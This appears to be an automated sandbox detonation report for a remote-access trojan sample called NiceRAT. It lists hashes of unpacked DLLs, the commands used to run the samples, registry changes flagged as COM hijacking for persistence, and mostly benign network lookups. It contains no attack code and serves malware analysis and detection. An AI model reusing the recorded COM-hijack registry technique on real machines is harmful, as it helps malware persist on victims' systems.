SHA512 6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

C:\Users\Admin\AppData\Local\Temp\_MEI49362\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-utility-l1-1-0.dll

MD5 9b622ca5388b6400705c8f21550bae8e
SHA1 eb599555448bf98cdeabc2f8b10cfe9bd2181d9f
SHA256 af1e1b84f066ba05da20847bffd874d80a810b5407f8c6647b3ff9e8f7d37863
SHA512 9872f54ac744cf537826277f1c0a3fd00c5aa51f353692c1929be7bc2e3836e1a52cab2c467ba675d4052ac3116f5622755c3db8be389c179f7d460391105545

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-time-l1-1-0.dll

MD5 0d9afb006f46478008c180b9da5465ac
SHA1 3be2f543bbc8d9f1639d0ed798c5856359a9f29b
SHA256 c3a70153e1d0ecd1cbf95de033bfef5cfecabe7a8274cafe272cc2c14865cd8c
SHA512 4bd76efcb2432994d10884c302aee6cadbc2d594bbbd4e654c1e8547a1efd76fd92e4879b8120dfacb5e8a77826009f72faa5727b1aa559ed3fc86d0ce3ed029

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-string-l1-1-0.dll

MD5 aacade02d7aaf6b5eff26a0e3a11c42d
SHA1 93b8077b535b38fdb0b7c020d24ba280adbe80c3
SHA256 e71d517e6b7039437e3fc449d8ad12eeeca0d5c8ed1c500555344fd90ddc3207
SHA512 e02fcbcb70100f67e65903d8b1a7e6314cabfb0b14797bd6e1c92b7bcb3994a54133e35d16da0a29576145b2783221330591526f856b79a25c0575fc923985a6

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-stdio-l1-1-0.dll

MD5 5df2410c0afd30c9a11de50de4798089
SHA1 4112c5493009a1d01090ccae810500c765dc6d54
SHA256 e6a1ef1f7c1957c50a3d9c1d70c0f7b0d8badc7f279cd056eb179dc256bfefda
SHA512 8ecb79078d05d5b2a432f511953985b3253d5d43d87709a5795709ee8dbca63c5f1166ed94d8984c13f2ea06adfa7d6b82c6735c23c6e64f2f37a257066864e6

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-runtime-l1-1-0.dll

MD5 dbd23405e7baa8e1ac763fa506021122
SHA1 c50ae9cc82c842d50c4317034792d034ac7eb5be
SHA256 57fe2bab2acb1184a468e45cebe7609a2986d5220bb2d82592b9ca6e22384f89
SHA512 dafea32e44224b40dcc9ca96fd977a7c14128ca1dd0a6144844537d52ba25bcec83c2fa94a665a7497be9e079e7fc71298b950e3a8a0c03c4a5c8172f11063b9

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-process-l1-1-0.dll

MD5 d8a5c1960281ec59fd4164c983516d7c
SHA1 29e6feff9fb16b9d8271b7da6925baf3c6339d06
SHA256 12bb3f480ec115d5f9447414525c5dcd236ed48356d5a70650541c9499bc4d19
SHA512 c97aa4029bcd8ffc490547dd78582ac81049dded2288102b800287a7fb623d9fde327702f8a24dfe2d2d67b2c9aaf97050756474faa4914ca4cb6038449c64bf

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-multibyte-l1-1-0.dll

MD5 0d19e7c415f72971239ca241fd960810
SHA1 682869cf2eb6f998d5ab50cc892383c9073e4646
SHA256 d0e566797a5861a745a8f46e1f79ff56185f7c64ce10623dad4700f8e410d94f
SHA512 f03a27e5d8c2c833df0b3e7531fd95cef507acd82dd72078377a7d54e2acd0284276b1f1f7406b2045899d29a6e04c26e061b37fcb9fc293626515247bd19f2b

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-math-l1-1-0.dll

MD5 c4cac2d609bb5e0da9017ebb535634ce
SHA1 51a264ce4545a2f0d9f2908771e01e001b4e763e
SHA256 7c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374
SHA512 3b55bdbc5132d05ab53852605afe6ed49f4b3decdde8b11f19a621a78a37d98c7aeaaa8c10bf4565b9b50162816305fa5192ee31950a96dc08ae46bfc6af4ffe

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-locale-l1-1-0.dll

MD5 ba17b278fff2c18e34e47562ddde8166
SHA1 bed762d11b98737fcf1d1713d77345ec4780a8c2
SHA256 c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e
SHA512 72516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-heap-l1-1-0.dll

MD5 a22f9a4cbd701209842b204895fedf37
SHA1 72fa50160baf1f2ea2adcff58f3f90a77a59d949
SHA256 2ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97
SHA512 903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 1193f810519fbc07beb3ffbad3247fc4
SHA1 db099628a19b2d34e89028c2e16bc89df28ed78f
SHA256 ab2158fe6b354fb429f57f374ca25105b44e97edcbdc1b752650d895dadd6fd1
SHA512 3222a10c3be5098aca0211015efe75cfbcd408fd28315acedd016d8f77513f81e207536b072001525965635da39c4aae8ef9f6ad367f5d695de67b1614179353

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-environment-l1-1-0.dll

MD5 e48a1860000fd2bd61566e76093984f5
SHA1 aa3f233fb19c9e7c88d4307bade2a6eef6518a8a
SHA256 67bbb287b2e9057bf8b412ad2faa266321ac28c6e6ba5f22169e2517a3ead248
SHA512 46b384c45d2fe2b70a5ac8ee087ba55828a62ccab876a21a3abd531d4de5ec7be21ff34b2284e0231b6cf0869eba09599c3b403db84448f20bd0fff88c1956d5

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-convert-l1-1-0.dll

MD5 0485c463cd8d2ae1cbd42df6f0591246
SHA1 ea634140905078e8f687a031ae919cff23c27e6f
SHA256 983f4d4c7b7330e7f5f091080c1e81905575ebccd97e11dff8a064979ec8d9b8
SHA512 ddf947a1b86c3826859570a3e1d59e4ec4564cfcf25c84841383a4b5f5ad6c2fe618078416aed201fb744d5fbd6c39dab7c1e964dd5e148da018a825fcc0044a

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-conio-l1-1-0.dll

MD5 75e626c3ebf160ebe75c59d3d6ac3739
SHA1 02a99199f160020b1086cec6c6a2983908641b65
SHA256 762ca8dd14f8ff603d06811ba904c973a684022202476bca45e9dc1345151ac4
SHA512 5ad205b90ac1658c5b07f6f212a82be8792999b68f9c9617a1298b04d83e7fcb9887ed307a9d31517bcba703b3ee6699ea93f67b06629355ea6519fed0a6d29a

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-util-l1-1-0.dll

MD5 4fc1d0fdb7b881793ded358f1880bc16
SHA1 7810439ec85cd8488079c7dfd95b559eae994f2c
SHA256 598c5cfc2b5ce7f9c874c85e47f7571f6127590a52b46e0a8f576a603dfefa94
SHA512 7cd48d24da337c0b104bf88becfa1eb40579c283c6ece62cb19a3c51c70bed3ef0660f4bb0837b1edcda19e51eee18da6237bb732bd2db0fbcece8d7f04efb76

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-timezone-l1-1-0.dll

MD5 36165a5050672b7b0e04cb1f3d7b1b8f
SHA1 ef17c4622f41ef217a16078e8135acd4e2cf9443
SHA256 d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7
SHA512 da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 eb3aeb684858b00bc6a90f68e8df5484
SHA1 f0a4298880ad6d7b1b92a289fd05fe352b3bca3b
SHA256 96a594b5a57303ae1e1dce14724a46500edc38d2c5cca0f52f0c77e3ebc916b1
SHA512 57ceea716c30d5ecc718114d5f4ad67f28acb949b9c537c78a000186dbd7e217f2fab0a4ac24df9e407b6260286a93161353fd82ade23c0280e825f91ff7690a

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-synch-l1-2-0.dll

MD5 dac3e271ef4a287821becda51aa12946
SHA1 a8d1211d4881e1ff1b948b5139fbaf2af5028e5c
SHA256 80fbae0acceb55364437bdd862d454db5acaa797ad0367931aef7677c7e84e7b
SHA512 c7664a12eaee82127cff203c79f16c87b9388e57adba7cdfe3b86f4b92aab198127658bf83f4b15c14f661b1c1e1aaa6a2195f036bbad3cb72229e7ae83bb435

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-synch-l1-1-0.dll

MD5 393ced54d952c843ac9e16354bff642b
SHA1 407fe145c0068150827d95544f8344a24eeaf589
SHA256 bf32d8aea6faebe41b1454e4b80b5a3639ba2cd35a9715de25acd7f28bf6d4de
SHA512 b296ff475ad0bdb8419b7535ce8ee0e1b20382f477a87ed57b257ed382755b6e9a5578697623a4cbadc32ff601e6b45f0e581869f2c45926cbbeda97fd6265b6

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-string-l1-1-0.dll

MD5 a92e0c30499a3be2b4166adafd86d0f4
SHA1 cb1293dc3ff5002b4950233cbc3bfa3a12249bdd
SHA256 3c2c4d10c8397a38d6a1407c4606907df5781b1339893c3861605094d8a69053
SHA512 70ed8bd03d3aecc5d2967d87dca376fdc69232422cb590a673eaf6721d2793ec2ad5d46884740a6d9f961b72f71e94ce322d773bc5db2807cc2708d35e0f48bd

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 e8789ec050c879b856f1f13b9cee6f3a
SHA1 8264646f975c87e89803fa62d5ceeb0100f38214
SHA256 197a57651e3014f9f3cf21fbcaa718de63f0a76f222a3ad08f287bfedc101bfa
SHA512 417785e476ea1a8ae88dc872683f4e5ef12695f4e74ec68f3921d89142cd443dba2e2c1d37f54c8eaa9c8ddaf14cdcf7502139a6c28a55502e242cde438d10f8

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-profile-l1-1-0.dll

MD5 2e19bdbf51d8caf97b2bcb886fdc5b2d
SHA1 5277e6a9660606d58a116776fbabd92fc4cdb417
SHA256 9518b9399ac4d459122e428173b2baaccd92c02e585a13e58a7812fad7012381
SHA512 0af6a11e4704a7251ca9b3ebe1269b24aff6620545895f33a60e04f8587738a02919f7e4d1fccb9a59a0a697560c8bf0ad64a3cff99ce7da4ca972bb3e704367

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d1b3cc23127884d9eff1940f5b98e7aa
SHA1 d1b108e9fce8fba1c648afaad458050165502878
SHA256 51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb
SHA512 ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 da29d8d5a978e12d07f930f402e14180
SHA1 568943dedabc74749db557cbb398b9d72d57501a
SHA256 84cec1a1aaf344a93581b0f0c293623cd07652982a9f54f2fc879092512c4d92
SHA512 da65f9490f46b2509c4e15a82879ce64baa947fc978f20e052fb9bb9d002bb9c21a5b847d1d6258a4fa5747fcd22542f246b14653f5a67c528d60f919ede70c5

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-memory-l1-1-0.dll

MD5 e7b662ffa023b7f07a85ac3fb8910c11
SHA1 261edc0c4068771f0d070c17e0721d8a1bfcaf9f
SHA256 13ae84007249d532f326a00ad62e5c1f463581f30701e662bb1b3658c4c32a07
SHA512 8df890a9aa191b594bbc033bc384deb27f9e4110e51632f681b33061b4370cec6ff2d637b20a38fc882ddc74dd8247f177cea2b05a13655e7b49e07bc280d756

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 d67863ab55ef2a9d195870c360ceaeb4
SHA1 b0a604463be51ef269f203e3a3be25b1d874ed05
SHA256 c6e8472ffc639ccd9c07e7f6954da9ae94779cb9a81acb11ed3588cdca1182b0
SHA512 b12fd7f7e9767f824810d2b3ed1fc3cb8d222c95a3894adaaed7e48cc9d690333e68665c622f0b9f3775b0a8b3e043b1e97b6987abb1ae68b94dda60d83371a2

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-localization-l1-2-0.dll

MD5 54d2f426bc91ecf321908d133b069b20
SHA1 78892ea2873091f016daa87d2c0070b6c917131f
SHA256 646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA512 6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 2acf6db396a86e2bef9d6ddf6919581f
SHA1 c67615b97b74776fa64407e7644f92cd14336cbb
SHA256 655bade7ff61f01a803e7532082b14ae354442b0f65ef8164f824d0cfa033e6f
SHA512 9a804bad2a9f220281cd3c20dbc96c023819da96cd24341c597a9d076b5fd176ec9da8e6a227628156827294cfb460e78d41eb053e133b1038a305c996453a36

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-interlocked-l1-1-0.dll

MD5 1144ced0d8198c39f62fc71c1ecf6cb1
SHA1 43ca991199a46ca1860f8a295209dee6d32d040d
SHA256 d4d86e560a22d833fcdf0ba165d3bd3f6059e69830f4d2f9748af08905b2d4c8
SHA512 006b420d4513fd2be1e07f7512891275cb76243fd4d49855836da53ff779fa695b9bd5661fa16b1c8f83d8cec6342c9719def8d3242431b13e803bdbc2d81e4b

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-heap-l1-1-0.dll

MD5 c7120579bb8f56f8cd4e0d329ece3e9d
SHA1 0b35862dcc9654fc4ede338c26d0368c112d4ba9
SHA256 2e00c0176952d7c009b93c40949f91f0ab367a1b274ee78b736bf563f0344da3
SHA512 6172179c349f9952e6fb47a72a459ee29563a511d9da2a16a265625f1d8ca40ff9bd52f78a26d29b5297e7413bfa22a9797df2934a68ea551d0ab45914ee7822

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-handle-l1-1-0.dll

MD5 31ffff2c6539b3d2f575500300b93d6b
SHA1 e28e8919150fca0cb385f55a4ec4d23058d92fbf
SHA256 6dcbdab7fa8cf66f4a05d1f5166bed33cd88bee1d37af6128f18184e6c301709
SHA512 716f42f0dc530774665982f189a1fbf0371aceb4087de67e5b677cb18a687900c73165a57ae8229b53744e2490d4f04a54686e09da3b5d8705e1df5b804fe27d

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-file-l2-1-0.dll

MD5 2e8995e2320e313545c3ddb5c71dc232
SHA1 45d079a704bec060a15f8eba3eab22ac5cf756c6
SHA256 c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c
SHA512 19adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-file-l1-2-0.dll

MD5 b5060343583e6be3b3de33ccd40398e0
SHA1 5b33b8db5d6cfb0e8a5bb7f209df2c6191b02edb
SHA256 27878021c6d48fb669f1822821b5934f5a2904740bebb340b6849e7635490cb7
SHA512 86610edc05aa1b756c87160f9eefe9365e3f712c5bed18c8feca3cae12aef07ccc44c45c4be19dc8f9d337a6f6709b260c89019a5efcfe9fa0847d85ab64d282

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-file-l1-1-0.dll

MD5 fec01082bccddadad0814f30b43ab078
SHA1 a6f6d9b61bb743651d3f65824d06427ca492c120
SHA256 c15dacec228f40ce4c5b9d69bba5e6627bc484c6e9d6550a76db6f332e9f7734
SHA512 c6039c366cb47ca31c7501423384afc0678a07abeb0ca1d97ecb5aa3c3e3acf84c9551dea1e56d1dbd4472dab70eed1c79d1c0612ba2730327ce6d0dc151c441

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 944a33d971704ff815a6c90733d0a72e
SHA1 7d8b9f68a3983a1b86bf4bae085cd5ca6f464921
SHA256 44822ae123a3d6c3a8bdf9a4d65a4dc89eb31004c72fcfcefa1dc3a53ff3eab0
SHA512 4d93dece856a24e50f12a53155e07f1aab501b17e7bbfcce205e1b37d2799caf3681b1770c522ba986ac3badba59d5d95a7526fe19f86a7b0d3d933ea73754e2

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-debug-l1-1-0.dll

MD5 02d669afdabfe420598041b848b71158
SHA1 25c0fdbc04ffcd570db041d02842d7530afeeb6e
SHA256 64a9ac181fd91b79270bf01759749394f57be171436ed46f43d165325bb82067
SHA512 5321290ec277fca8840e6c9cb7e77d39e820b1d98ef9c29040efaf2a7628c023209c936e08abfb6962a795130874544db25e1bac0d16256a1ebbca0fdcdaa81a

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-datetime-l1-1-0.dll

MD5 f0c9c56f56ffa3adc548173569dbd793
SHA1 220a56b84cdb8cd403483d3f6b4bb526fe198fd9
SHA256 12d801992bbb09d43bb90330bb96e77bf12e669c325dda4b5235942221c301c8
SHA512 28e24a2ccedfaf01aef615c1df7f8c76ff0eb06d992eb1b422f902d6d96357ba6a353e31ca9b1fd305e7de7a437ee6a7f2f01bfdf27c4a88c805693ae2b6352c

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-console-l1-1-0.dll

MD5 2c146bc8d73b8944f35506241b9953a9
SHA1 ac64abd745418cea35c0506b9cb0331b171b51ea
SHA256 89384f8f64a9b7f67c8deccaa721e2d76b8a17026d8083630859ed0cd1a9b58b
SHA512 02713948a156baccb2e7c38646193e82fef65400c086644866b698bc3e0a8c155a8eab829463e3868ce2b8a06608c5ea6de1e390bff976c5f92e2e42dd6c04f1

C:\Users\Admin\AppData\Local\Tempcrurvtniey.db

MD5 67b95c4953728c6e0a0c46500c5eae90
SHA1 da45ac8416f23de80bbba01e07be55f19cf179a7
SHA256 cb81759f372ae259288f70fc6bb807b585731085f08b1b358a9471ae7afbd16b
SHA512 08fdece58c30c00c42b2adf17842185a2f4c9c2bebd29882d45e1276033cb160242e44161f795d09abf0937c5b322f3c44fd63c9d33380475b3dd92149f03dec

C:\Users\Admin\AppData\Local\Tempcrctrsdnjo.db

MD5 795012446dafc997c0f790a1ca38904a
SHA1 5b8b9112f9fb063888587a7ab4c2b9d13c620810
SHA256 ad8f16e72473f70dcbf368b863878378ec7c65180f371c95f4e9e668efb064c2
SHA512 db10939f341581a85f83fadac13964f16d9e408b4fb658e6ec634e9ad6954dc7733aa9ab36d855d17047a8227e147608c4248aab60b101790c272f3f720d9dac

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:32

Platform

win7-20240419-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pyc C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pyc\ = "pyc_auto_file" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 62eaa26fa564d26370dc0b09a52db318
SHA1 8476c71c61ae78e5ae510f1d4acab9056c8b939a
SHA256 4bac2752966da51267defa795b2647b715bf24856333158d5769196575999ce6
SHA512 34dc24cad6838f5d77784c1cacfbfac086bc8954791aa37383638629856e82c0c587f840feafcdaeb7037df27cfbfc07d6f328afde77ff69c2dd9aa8e094362d

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240611-en

Max time kernel

299s

Max time network

303s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240508-en

Max time kernel

118s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240611-en

Max time kernel

119s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240611-en

Max time kernel

121s

Max time network

123s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "nsIMapi" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240508-en

Max time kernel

78s

Max time network

99s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy.dll" C:\Windows\system32\regsvr32.exe N/A
